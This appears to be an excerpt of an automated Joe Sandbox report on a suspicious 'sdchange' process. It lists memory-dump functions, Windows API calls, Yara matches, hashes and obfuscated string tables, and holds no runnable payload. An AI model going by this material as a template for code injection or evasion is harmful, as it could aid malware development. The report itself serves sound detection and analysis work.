                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02714412
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                      • Instruction ID: 57daefbe09fd070949e55dba081dcbe7161d6a659bf821f22476f6b9803ba697
                                                                                                                      • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                      • Instruction Fuzzy Hash: EB011EB5D4020EBBDB10EAE4DC55F9EB7799F54308F0441A5E908A7241F671EB188B91
                                                                                                                      Function 02729620 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,0271811E,00000010,?,?,?,00000044,?,00000010,0271811E,?,?,?), ref: 02729680
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: 8d3275dbc5a7a7bce2b4fbbbe9d4b083b5904faafbbc20ef5fad49c011a5fb0d
                                                                                                                      • Instruction ID: 18805a159538063f57529b735e55c2e310ef0d4ffc0e871ea7f0c5c1dd7e18ea
                                                                                                                      • Opcode Fuzzy Hash: 8d3275dbc5a7a7bce2b4fbbbe9d4b083b5904faafbbc20ef5fad49c011a5fb0d
                                                                                                                      • Instruction Fuzzy Hash: 240184B2214548BBCB44DE99DC85EDB77ADAF8D754F408608FA0D97240D670F8518BA4
                                                                                                                      Function 02709DC0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709E05
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: a8d8df1df808b865a0818dc964bb2ed4eed5ce07385ccfd871cd12b6f5da64cd
                                                                                                                      • Instruction ID: 94afd2d8eba165c3c2484db7ff7e95f938dbc56a104d2e2fd42df950e196a844
                                                                                                                      • Opcode Fuzzy Hash: a8d8df1df808b865a0818dc964bb2ed4eed5ce07385ccfd871cd12b6f5da64cd
                                                                                                                      • Instruction Fuzzy Hash: B6F0657334021476E321B1A99C06FDB729D9B80BA1F15012AF74CEA2C0D992B94546E5
                                                                                                                      Function 02709DBA Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709E05
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: af31efd8bd227fe044c684d51fe370113cc72b0572b381049b06e12d4343a1cf
                                                                                                                      • Instruction ID: ed6deb7c97a6c16d67c8d9aba02b61d0f73208365cef5884b39ee978139fb16c
                                                                                                                      • Opcode Fuzzy Hash: af31efd8bd227fe044c684d51fe370113cc72b0572b381049b06e12d4343a1cf
                                                                                                                      • Instruction Fuzzy Hash: D8F0E57324021076E231A2A98C06FDB739DDFC0B60F250019F788EB2C0DA92B90586E5
                                                                                                                      Function 02729540 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(02711879,?,027256B5,02711879,027253AF,027256B5,?,02711879,027253AF,00001000,?,?,00000000), ref: 0272957F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction ID: c54bf79516f1f804f9bfcc0d4a0b12f7abad56af432c85d5041ab53b91f81a32
                                                                                                                      • Opcode Fuzzy Hash: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction Fuzzy Hash: 37E06572201208BBDB10EE58EC44FAB3BADEFC9710F004418FA0DA7281C670B8148BB4
                                                                                                                      Function 02729590 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,02713C12,000000F4), ref: 027295CC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction ID: e469beabf591e4b163c9baea8cedc48eb777f43fd9e8b93635fbf6c4f547f7cf
                                                                                                                      • Opcode Fuzzy Hash: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction Fuzzy Hash: 43E065B6200204BBD614EE59DC89FAB33ADEFC9714F00441AFA08A7240D630B810CAB8
                                                                                                                      Function 02718160 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0271818C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: c2a94f8c2ab9474f79cbb454fe15d7603fa289170f7293361a09a69c9f74b6ad
                                                                                                                      • Instruction ID: 7c8ab42d2c4612c273737810cfb3e6dabde9b319a6016879d478042946de002d
                                                                                                                      • Opcode Fuzzy Hash: c2a94f8c2ab9474f79cbb454fe15d7603fa289170f7293361a09a69c9f74b6ad
                                                                                                                      • Instruction Fuzzy Hash: 2FE0267265020427FB20AAACDC45F66335AAF48728F184A64FA1CDB2C2E6B8F5018150
                                                                                                                      Function 0271815B Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0271818C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 2d0f5d596c3bd42d8979895f13e0bef32511b8b730510905a2684bf2e38407a9
                                                                                                                      • Instruction ID: 8a03df731969d95b255ae3622b35ebd1c1214b0a92fd92404f426be45daae5ae
                                                                                                                      • Opcode Fuzzy Hash: 2d0f5d596c3bd42d8979895f13e0bef32511b8b730510905a2684bf2e38407a9
                                                                                                                      • Instruction Fuzzy Hash: 95E0807655020427F724B65CCC45F6533666F48724F5C4654FA5C9B2C1D7B4E5015151
                                                                                                                      Function 02717F50 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02711B70,02727CEE,027253AF,02711B40), ref: 02717F83
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 11e6c51df6b1bf69c6866fd535af1d4f18b9f9aced007728cdea7892ec79bce8
                                                                                                                      • Instruction ID: 3a2c6ed52f95c26556e954c31514e03153115220aa70da6bd6d54d68de0d4163
                                                                                                                      • Opcode Fuzzy Hash: 11e6c51df6b1bf69c6866fd535af1d4f18b9f9aced007728cdea7892ec79bce8
                                                                                                                      • Instruction Fuzzy Hash: 63D05EB52902043FF700F6B88C0AF16369DAB41754F594168FA4CE72C2EA54E1004665
                                                                                                                      Function 02710C4B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(?,00000111), ref: 02710C57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: c809d9ace770d773fe7cb53d58a20e9202e0589636535098963f5a6658a19a7c
                                                                                                                      • Instruction ID: 01452702c273f4482fcfd543d8734eb534c5b32b8aa89bfea59e6a652cbc457c
                                                                                                                      • Opcode Fuzzy Hash: c809d9ace770d773fe7cb53d58a20e9202e0589636535098963f5a6658a19a7c
                                                                                                                      • Instruction Fuzzy Hash: 91D0C96BB4111C7AAA125999ACC1DFEB76CEB85AA6F004067FF08E6140E66199060AB1
                                                                                                                      Function 046D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5390755f3d69905df5dfe46c75061981bb00115f4904ba69d46bbaae99cd4491
                                                                                                                      • Instruction ID: f42faa7d090eba497ddc9c877adb025af86af3af2bffeb967540ce11b9a720cb
                                                                                                                      • Opcode Fuzzy Hash: 5390755f3d69905df5dfe46c75061981bb00115f4904ba69d46bbaae99cd4491
                                                                                                                      • Instruction Fuzzy Hash: 43B09B71D025C5C5FB51FB64460871779406BD0705F15C061D2030751F5738D5D1F175

                                                                                                                      Non-executed Functions

                                                                                                                      Function 045704EE Relevance: .2, Instructions: 152COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539591355.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4570000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 802e3b4cba91c50b6f60fa8a06f4d09d26afcb49eb05d8c9692640fa720e9ee4
                                                                                                                      • Instruction ID: 6ed63c1dd1e392351c291685ecc6e028eea7df92e142b30702dfe62747895a48
                                                                                                                      • Opcode Fuzzy Hash: 802e3b4cba91c50b6f60fa8a06f4d09d26afcb49eb05d8c9692640fa720e9ee4
                                                                                                                      • Instruction Fuzzy Hash: 5A41D871518B0E4FD768EF68A081676B3E2FB85314F50463DD98AC3292EA74F4468785
                                                                                                                      Function 0457DE7A Relevance: 56.5, Strings: 45, Instructions: 217COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539591355.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4570000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                      • API String ID: 0-3558027158
                                                                                                                      • Opcode ID: 95a305c28a97bed85c99d851cbdcd5af69411470f5cc0edba5b98284e54cb02f
                                                                                                                      • Instruction ID: b5bd9ac6a32dfa0d5dec9ebaffca22f2bf3e54a9f974b4203c58f1e4a13235e3
                                                                                                                      • Opcode Fuzzy Hash: 95a305c28a97bed85c99d851cbdcd5af69411470f5cc0edba5b98284e54cb02f
                                                                                                                      • Instruction Fuzzy Hash: 469150F04083988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                      Function 04573A9B Relevance: 20.1, Strings: 16, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539591355.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4570000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %;-$,9?:$:}ax$?.d($apma$axy>$d(%;$ey|v$mxy.$mxy9$ta|z$teey$y9te${:m}$|vta$|z{:
                                                                                                                      • API String ID: 0-164121575
                                                                                                                      • Opcode ID: d3ed7e1a1c3758e5bc7aad41ac7dabce32668f9f7ef93d04a9f41d0bdda33049
                                                                                                                      • Instruction ID: 3d1ac4dc13359bbe1782114a7c73cade6188d1be0188478f9012906f696d4ade
                                                                                                                      • Opcode Fuzzy Hash: d3ed7e1a1c3758e5bc7aad41ac7dabce32668f9f7ef93d04a9f41d0bdda33049
                                                                                                                      • Instruction Fuzzy Hash: F61136B0C14A0C9ACF04DF96E8805EDBB74FB15344F10825AD415AE395DB345A82DF9A
                                                                                                                      Function 046D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: 114685162dbb24c743ba3b6b0ec60c6a850f11afa4f92cc4c8ecd21b9e79598c
                                                                                                                      • Instruction ID: 5964d1ef847efe4e1c67f3068d9d75e0aee0ed55c6657e4526e91c04107f3445
                                                                                                                      • Opcode Fuzzy Hash: 114685162dbb24c743ba3b6b0ec60c6a850f11afa4f92cc4c8ecd21b9e79598c
                                                                                                                      • Instruction Fuzzy Hash: FA51D5A5E04216BFDB20DF99C89097EF7F8BB58204B108269E465D7745F274FE448BE0
                                                                                                                      Function 04742410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: a0f060e1a2ed6aca516d1a2f30d238d8569b841c8d3625070578502c1d229577
                                                                                                                      • Instruction ID: 34cf3d473c2d227762bf4ae08ef7cfce4923f206660a986075a7b3a83c8dbb59
                                                                                                                      • Opcode Fuzzy Hash: a0f060e1a2ed6aca516d1a2f30d238d8569b841c8d3625070578502c1d229577
                                                                                                                      • Instruction Fuzzy Hash: 8D510371A00645AFDB20DE9DC89097EF7F8EF84244B008499F496D3742EBB4FE508BA0
                                                                                                                      Function 046C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04704742
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04704787
                                                                                                                      • ExecuteOptions, xrefs: 047046A0
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04704725
                                                                                                                      • Execute=1, xrefs: 04704713
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047046FC
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04704655
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: 641fc0bed2d7f5e3437c13db3688622605c6f105e6a86913c29bfb5d75f83d7b
                                                                                                                      • Instruction ID: 8a97bee3a66fe4e9ff9bb5735cbab0649a43d5067c849ef91822ce7678b4499b
                                                                                                                      • Opcode Fuzzy Hash: 641fc0bed2d7f5e3437c13db3688622605c6f105e6a86913c29bfb5d75f83d7b
                                                                                                                      • Instruction Fuzzy Hash: F5512831B4021AABEF10ABA5DC89BFD73A8EB15305F14009DE605A7290FB71BE418F54
                                                                                                                      Function 04766940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                      • Instruction ID: 3c112dd41284b53c849903da6e4dfd54c0fbe5abbc54edef1eb3ccbd7564cba5
                                                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                      • Instruction Fuzzy Hash: E7021571508341AFD709CF18C494A6ABBE6EFC4704F548A2DF98A9B364DB31E945CB42
                                                                                                                      Function 046DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: 208bd040a1ddf8b36d5da18dc757eb5db401a45711bb390d47763b5d5890b4fb
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 5D81D030F052899FDF248E68C8917FEBBB1AF55B50F1A4119E861A7398F734B841CB54
                                                                                                                      Function 047420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                      • Opcode ID: 7555bab9236123b390b441f531a5b10ae1fe14dd414b5979cbc14acdc1a3f83f
                                                                                                                      • Instruction ID: a2a853d9f3c249571ffd01197df40a12287b75874b0a2744807d238137c56a0b
                                                                                                                      • Opcode Fuzzy Hash: 7555bab9236123b390b441f531a5b10ae1fe14dd414b5979cbc14acdc1a3f83f
                                                                                                                      • Instruction Fuzzy Hash: CB215376E00119ABDB10DFA9C844AFEB7E9EF84684F14016AF905E3301F730EA11CBA5
                                                                                                                      Function 046BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047002E7
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047002BD
                                                                                                                      • RTL: Re-Waiting, xrefs: 0470031E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 78efc76b8119b0ac604374b4abdd8dd8d0c8119889a048ecca0ccc3079d9fba6
                                                                                                                      • Instruction ID: f874ad50c5ffb2585c1e3697ea78e4b09c8a06dd88196e5f1e797b6366ef1418
                                                                                                                      • Opcode Fuzzy Hash: 78efc76b8119b0ac604374b4abdd8dd8d0c8119889a048ecca0ccc3079d9fba6
                                                                                                                      • Instruction Fuzzy Hash: D3E1A030604741DFD729CF28D984B5AB7E0AB48324F144A6DE5A5C73E1E774E985CB82
